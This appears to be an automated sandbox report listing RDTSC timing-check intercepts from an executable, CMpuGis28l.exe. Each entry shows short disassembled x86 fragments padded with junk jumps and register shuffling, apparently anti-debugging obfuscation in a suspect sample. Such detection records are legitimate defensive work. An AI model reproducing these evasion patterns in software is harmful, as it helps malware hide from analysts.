Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773007D second address: 77300AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov si, dx 0x00000015 jmp 00007F9334DAF99Fh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77300AE second address: 77300B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77300B4 second address: 77300B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77300B8 second address: 77300D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov edx, eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77300D1 second address: 773017D instructions: 0x00000000 rdtsc 0x00000002 call 00007F9334DAF99Eh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b mov dl, ah 0x0000000d pop edx 0x0000000e popad 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 movzx ecx, bx 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007F9334DAF99Ah 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d call 00007F9334DAF99Eh 0x00000022 mov eax, 100118F1h 0x00000027 pop eax 0x00000028 movsx edi, si 0x0000002b popad 0x0000002c mov ebx, dword ptr [eax+10h] 0x0000002f jmp 00007F9334DAF9A6h 0x00000034 xchg eax, esi 0x00000035 pushad 0x00000036 mov si, EC0Dh 0x0000003a movzx eax, di 0x0000003d popad 0x0000003e push eax 0x0000003f pushad 0x00000040 mov esi, 33EA6341h 0x00000045 mov si, F27Dh 0x00000049 popad 0x0000004a xchg eax, esi 0x0000004b jmp 00007F9334DAF9A8h 0x00000050 mov esi, dword ptr [76EB06ECh] 0x00000056 pushad 0x00000057 mov cl, 73h 0x00000059 mov ch, dh 0x0000005b popad 0x0000005c test esi, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F9334DAF9A1h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773017D second address: 77301C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F9334BA0E9Ah 0x0000000f jmp 00007F9334BA002Eh 0x00000014 xchg eax, edi 0x00000015 jmp 00007F9334BA0030h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9334BA002Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77301C9 second address: 77301CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77301CD second address: 77301D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77301D3 second address: 77301D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77301D9 second address: 77301F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9334BA002Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77301F2 second address: 77301F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77301F8 second address: 7730209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730209 second address: 773020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773020D second address: 7730234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [76E80B60h] 0x0000000e mov eax, 7617E5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 call 00007F9334BA0036h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730234 second address: 7730259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push 00000044h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9334DAF9A9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730259 second address: 773025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773025D second address: 7730263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730263 second address: 7730269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730269 second address: 773026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773026D second address: 77302A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0036h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d call 00007F9334BA002Eh 0x00000012 mov di, ax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 movsx edi, ax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77302A2 second address: 77302A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77302A6 second address: 77302FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 jmp 00007F9334BA0032h 0x0000000d push eax 0x0000000e pushad 0x0000000f mov dh, B4h 0x00000011 mov ah, 3Eh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 jmp 00007F9334BA0035h 0x0000001a push dword ptr [eax] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F9334BA002Ah 0x00000025 and esi, 03E1FF78h 0x0000002b jmp 00007F9334BA002Bh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730383 second address: 7730393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730393 second address: 77303E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9334BA0038h 0x00000013 adc si, E358h 0x00000018 jmp 00007F9334BA002Bh 0x0000001d popfd 0x0000001e jmp 00007F9334BA0038h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77303E3 second address: 77304F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9334DAF9A4h 0x00000012 xor al, 00000018h 0x00000015 jmp 00007F9334DAF99Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F9334DAF9A8h 0x00000021 or al, 00000078h 0x00000024 jmp 00007F9334DAF99Bh 0x00000029 popfd 0x0000002a popad 0x0000002b je 00007F93A44AEBFCh 0x00000031 jmp 00007F9334DAF9A6h 0x00000036 sub eax, eax 0x00000038 jmp 00007F9334DAF9A1h 0x0000003d mov dword ptr [esi], edi 0x0000003f jmp 00007F9334DAF99Eh 0x00000044 mov dword ptr [esi+04h], eax 0x00000047 pushad 0x00000048 movzx esi, bx 0x0000004b pushfd 0x0000004c jmp 00007F9334DAF9A3h 0x00000051 or eax, 53776CFEh 0x00000057 jmp 00007F9334DAF9A9h 0x0000005c popfd 0x0000005d popad 0x0000005e mov dword ptr [esi+08h], eax 0x00000061 jmp 00007F9334DAF99Eh 0x00000066 mov dword ptr [esi+0Ch], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c pushfd 0x0000006d jmp 00007F9334DAF99Dh 0x00000072 add al, FFFFFFE6h 0x00000075 jmp 00007F9334DAF9A1h 0x0000007a popfd 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77304F9 second address: 77304FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77304FE second address: 7730504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730504 second address: 7730508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730508 second address: 7730530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+4Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730530 second address: 7730534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730534 second address: 7730547 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730547 second address: 773054D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773054D second address: 7730551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730551 second address: 77305CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b pushad 0x0000000c jmp 00007F9334BA002Dh 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop edx 0x00000014 mov di, si 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [ebx+50h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F9334BA0032h 0x00000023 sbb ch, FFFFFFA8h 0x00000026 jmp 00007F9334BA002Bh 0x0000002b popfd 0x0000002c mov ecx, 5EEA279Fh 0x00000031 popad 0x00000032 mov dword ptr [esi+14h], eax 0x00000035 jmp 00007F9334BA0032h 0x0000003a mov eax, dword ptr [ebx+54h] 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F9334BA0037h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77305CF second address: 77305D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77305D5 second address: 7730618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+18h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F9334BA002Bh 0x00000017 adc ch, FFFFFFAEh 0x0000001a jmp 00007F9334BA0039h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730618 second address: 7730643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 65h 0x00000005 push esi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+58h] 0x0000000d jmp 00007F9334DAF9A0h 0x00000012 mov dword ptr [esi+1Ch], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dl, ABh 0x0000001a mov esi, 10A7F0A5h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730643 second address: 7730657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov dh, al 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+5Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730657 second address: 773065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773065B second address: 7730669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773077D second address: 7730783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730783 second address: 7730789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730789 second address: 77307D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f jmp 00007F9334DAF9A0h 0x00000014 mov word ptr [esi+30h], ax 0x00000018 jmp 00007F9334DAF9A0h 0x0000001d mov ax, word ptr [ebx+00000088h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77307D8 second address: 77307DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77307DC second address: 77307F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77307F9 second address: 7730864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334BA0037h 0x00000009 and esi, 6D2AC7EEh 0x0000000f jmp 00007F9334BA0039h 0x00000014 popfd 0x00000015 jmp 00007F9334BA0030h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov word ptr [esi+32h], ax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9334BA0037h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730864 second address: 773086A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773086A second address: 773086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773086E second address: 7730872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730872 second address: 7730885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730885 second address: 77308A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF9A6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77308A0 second address: 77308C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F9334BA002Bh 0x00000014 pop ecx 0x00000015 mov ebx, 7F78549Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77308C7 second address: 77308CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77308CC second address: 77308EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, ah 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9334BA0034h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77308EE second address: 7730933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9334DAF99Bh 0x00000015 xor si, E82Eh 0x0000001a jmp 00007F9334DAF9A9h 0x0000001f popfd 0x00000020 mov ax, 12B7h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730933 second address: 7730997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c jmp 00007F9334BA002Eh 0x00000011 mov dword ptr [esi+3Ch], eax 0x00000014 jmp 00007F9334BA0030h 0x00000019 mov eax, dword ptr [ebx+20h] 0x0000001c jmp 00007F9334BA0030h 0x00000021 mov dword ptr [esi+40h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F9334BA0037h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730997 second address: 773099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773099D second address: 77309A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77309A1 second address: 77309A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77309A5 second address: 77309B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77309B9 second address: 77309BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77309BD second address: 77309C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77309C3 second address: 77309F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F9334DAF99Dh 0x0000000b sbb si, 6B36h 0x00000010 jmp 00007F9334DAF9A1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b pushad 0x0000001c mov cl, 96h 0x0000001e push eax 0x0000001f push edx 0x00000020 mov bl, 8Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730AC5 second address: 7730AF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9334BA0038h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730AF8 second address: 7730AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730AFC second address: 7730B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730B02 second address: 7730BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9334DAF99Ch 0x00000008 call 00007F9334DAF9A2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 js 00007F93A44AE532h 0x00000017 jmp 00007F9334DAF9A1h 0x0000001c mov eax, dword ptr [ebp-0Ch] 0x0000001f jmp 00007F9334DAF99Eh 0x00000024 mov dword ptr [esi+04h], eax 0x00000027 jmp 00007F9334DAF9A0h 0x0000002c lea eax, dword ptr [ebx+78h] 0x0000002f jmp 00007F9334DAF9A0h 0x00000034 push 00000001h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b pushfd 0x0000003c jmp 00007F9334DAF9A3h 0x00000041 jmp 00007F9334DAF9A3h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730BA5 second address: 7730BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA0034h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730BBD second address: 7730BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730BC1 second address: 7730BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ebx, ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730BCF second address: 7730BDF instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730BDF second address: 7730BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730BE5 second address: 7730BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730C68 second address: 7730C80 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 3A819015h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a js 00007F93A429EA6Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop esi 0x00000015 mov dh, 39h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730C80 second address: 7730CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, CC94h 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebp-04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9334DAF9A2h 0x00000016 rdtsc
